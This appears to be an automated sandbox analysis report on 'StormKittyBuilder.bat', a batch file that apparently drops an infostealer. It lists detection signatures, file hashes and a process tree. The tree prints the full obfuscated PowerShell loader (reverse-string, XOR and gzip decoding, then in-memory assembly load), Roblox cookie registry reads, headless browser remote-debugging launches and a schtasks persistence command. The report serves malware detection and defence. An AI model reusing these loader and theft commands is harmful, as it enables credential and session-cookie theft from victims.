Analysis

  • max time kernel
    62s
  • max time network
    49s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28/03/2025, 01:37

General

  • Target

    StormKittyBuilder.bat

  • Size

    432KB

  • MD5

    7cf5561ba84bda0718d0c93b2ab88d6b

  • SHA1

    0c2a5bc7f8105b0d0017186a5a733cc6b6feff69

  • SHA256

    449addfee92a5ca256cf35563ee3fb6e61380922803ef24db9aef5e376325458

  • SHA512

    236b8a5acf67d4388638683db2616cda0b638774400c8be12effc1bec0e27c30516027675b8cacca22140d178da1a85c3fdac4e560644422d4b8b90d5d9400f8

  • SSDEEP

    12288:ikk/8cmfunb4i/d+X7ixl0wi7bOJfZBHnRnl6xu6ibnzeOb:ikzcmE/d+i676xZBHRlP6Wh

Malware Config

Signatures

  • Uses browser remote debugging 2 TTPs 12 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Executes dropped EXE 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1236
    • C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat.exe
      "StormKittyBuilder.bat.exe" -noprofile -windowstyle hidden -executionpolicy bypass -command $BtCqB = 'gnirtS46esaBmorF'.ToCharArray();[array]::Reverse($BtCqB);$HBrFK = [String]::new($BtCqB);$ooDPF = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\StormKittyBuilder.bat').Split([Environment]::NewLine);$VkrdH = $ooDPF[$ooDPF.Length - 1];$qzpvp = [System.Convert]::$HBrFK($VkrdH);$byYXP = [System.Convert]::$HBrFK('Hn1TY+SEHeJhLmLfjxR6/ti7FHUqnYTip3nYvXFvLjs=');for ($i = 0; $i -le $qzpvp.Length - 1; $i++) { $qzpvp[$i] = ($qzpvp[$i] -bxor $byYXP[$i % $byYXP.Length]); };$JAWhQ = New-Object System.IO.MemoryStream(, $qzpvp);$AwMCR = New-Object System.IO.MemoryStream;$oMZsB = New-Object System.IO.Compression.GZipStream($JAWhQ, [IO.Compression.CompressionMode]::Decompress);$oMZsB.CopyTo($AwMCR);$oMZsB.Dispose();$JAWhQ.Dispose();$AwMCR.Dispose();$qzpvp = $AwMCR.ToArray();[System.Reflection.Assembly]::Load($qzpvp).EntryPoint.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:3108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2604
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.google.com" --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=1430 --remote-allow-origins=ws://localhost:1430 --disable-extensions --no-sandbox --disable-gpu
        3⤵
        • Uses browser remote debugging
        • Drops file in Windows directory
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3328
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x268,0x26c,0x270,0x264,0x2e4,0x7ffd476ff208,0x7ffd476ff214,0x7ffd476ff220
          4⤵
            PID:3148
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2100,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:2
            4⤵
              PID:3296
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2128,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:11
              4⤵
                PID:4124
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3052,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:13
                4⤵
                  PID:2852
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3316,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3312 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2612
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3560,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2220
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3700,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3060
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4316,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:9
                  4⤵
                  • Uses browser remote debugging
                  PID:4964
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4344,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1716
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3736,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:9
                  4⤵
                  • Uses browser remote debugging
                  PID:2592
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=1430 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4544,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4540 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:5204
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4680,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4676 /prefetch:14
                  4⤵
                    PID:5852
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4744,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4740 /prefetch:14
                    4⤵
                      PID:5860
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4472,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4476 /prefetch:14
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5548
                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
                        cookie_exporter.exe --cookie-json=1128
                        5⤵
                          PID:5780
                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5228,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:14
                        4⤵
                          PID:5596
                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5228,i,6456184515903834480,17556975386307088996,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:14
                          4⤵
                            PID:5612
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com" --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=4659 --remote-allow-origins=ws://localhost:4659 --disable-extensions --no-sandbox --disable-gpu
                          3⤵
                          • Uses browser remote debugging
                          • Drops file in Windows directory
                          • Enumerates system info in registry
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of WriteProcessMemory
                          PID:4760
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffd6482dcf8,0x7ffd6482dd04,0x7ffd6482dd10
                            4⤵
                              PID:3548
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1944,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1936 /prefetch:2
                              4⤵
                                PID:976
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2804,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2820 /prefetch:11
                                4⤵
                                  PID:4676
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2812,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2116 /prefetch:13
                                  4⤵
                                    PID:1796
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=4659 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2840,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2852 /prefetch:1
                                    4⤵
                                    • Uses browser remote debugging
                                    PID:1824
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=4659 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2860,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2848 /prefetch:1
                                    4⤵
                                    • Uses browser remote debugging
                                    PID:1408
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=4659 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4056,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4052 /prefetch:1
                                    4⤵
                                    • Uses browser remote debugging
                                    PID:5216
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4636,i,14904907883577825712,4506783563282438378,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4632 /prefetch:14
                                    4⤵
                                      PID:5124
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    "schtasks.exe" /Create /TN "CleanUp" /TR "C:\Users\Admin\AppData\Roaming\Cleanup.exe" /SC ONLOGON /RL HIGHEST /F
                                    3⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3232
                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                1⤵
                                  PID:1840
                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                  1⤵
                                    PID:828
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                    1⤵
                                      PID:5460
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Cleanup.exe
                                      1⤵
                                        PID:4316

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

                                        Filesize

                                        1KB

                                        MD5

                                        a7c85eb648de5f3be7d71213fd6e9896

                                        SHA1

                                        047718d42cbf2e4c6b4482ff9f5c0c820427cd34

                                        SHA256

                                        620d75865be3d638959b7c34bea53741a4bf73ada24afaf4d1c251ac295af641

                                        SHA512

                                        c0e97abd9758980219ce148e6f0de6c3e66a11c6bb65caea7f0a1bb2a14115675a879998c9461329c9e2b8445f47b8738a03226200a3e9d656f00c86fc116dd2

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                        Filesize

                                        2B

                                        MD5

                                        d751713988987e9331980363e24189ce

                                        SHA1

                                        97d170e1550eee4afc0af065b78cda302a97674c

                                        SHA256

                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                        SHA512

                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT

                                        Filesize

                                        16B

                                        MD5

                                        46295cac801e5d4857d09837238a6394

                                        SHA1

                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                        SHA256

                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                        SHA512

                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001

                                        Filesize

                                        41B

                                        MD5

                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                        SHA1

                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                        SHA256

                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                        SHA512

                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        79KB

                                        MD5

                                        16370450229296e088a1a9af9a9fdcd1

                                        SHA1

                                        c306bc18c5cd1e22431c73556737217bccd749bf

                                        SHA256

                                        4d50752fd4398aada487237b890c7d2fae8a6b74d984a30a1a56994e16d8846f

                                        SHA512

                                        cb90a616a7fbd1a7bde4c09e5a51b8ff09c815da6ce42cd07c61ef67f9ae291ff829d7bed81f8650096f37a66298e1c65d063bd041cfe066b6cb4d3ae8745761

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        2KB

                                        MD5

                                        88dc70c361a22feac57b031dd9c1f02f

                                        SHA1

                                        a9b4732260c2a323750022a73480f229ce25d46d

                                        SHA256

                                        43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

                                        SHA512

                                        19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        280B

                                        MD5

                                        ecf610ffadb6b05b729f1fb747c925ce

                                        SHA1

                                        552e136d3b35f6554388dbf3de27cc3f13aac1aa

                                        SHA256

                                        e60d57b0c686fee38e691bd9736e26c41a31f3f058f68c1176c0a71f8108abdd

                                        SHA512

                                        ac191b7ef1e260e052031443b9e97b79824c03ae79dc76639317c4f3c70c33ab7b3239cfcf38ae5ed803adf4bb011bb9a9973cb9ba1787b91de2c171cba803b5

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        280B

                                        MD5

                                        d078e361e0ed3a9230b38d7f87140520

                                        SHA1

                                        235c905284ee451b6d19054ce804e8e02a4dceaa

                                        SHA256

                                        c568a7aab912809de985c73e6f662c91cf29ef7e6d91ef6a2ff03989f0894338

                                        SHA512

                                        79eac09b34e1b2274901e9114c16212b608d4ba2c8875e000b77b6cab80578e25ad5c8020ff0f32c4b57884c7bc41cc494b936b4154f5d922ebba3e6457ac9e7

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                        Filesize

                                        69KB

                                        MD5

                                        164a788f50529fc93a6077e50675c617

                                        SHA1

                                        c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                        SHA256

                                        b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                        SHA512

                                        ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                        Filesize

                                        107KB

                                        MD5

                                        40e2018187b61af5be8caf035fb72882

                                        SHA1

                                        72a0b7bcb454b6b727bf90da35879b3e9a70621e

                                        SHA256

                                        b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

                                        SHA512

                                        a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                        Filesize

                                        1KB

                                        MD5

                                        bfd3c60be8622b095b32d0dc9dbd8962

                                        SHA1

                                        d2c180b805459668e0dc65db1943b49c43a05d98

                                        SHA256

                                        5794490cb2336410c4e2be6f8e73edf9766af61d687c96b3e19f504d33b75cd6

                                        SHA512

                                        1cea16f3050d62278ce8e46797b53727f44c1574b224cde54f855db0484f8725f716343d1bd9a15df875f0d5363c5d70fb30e5f31d0e4f9dcb4efb2ee3ef6516

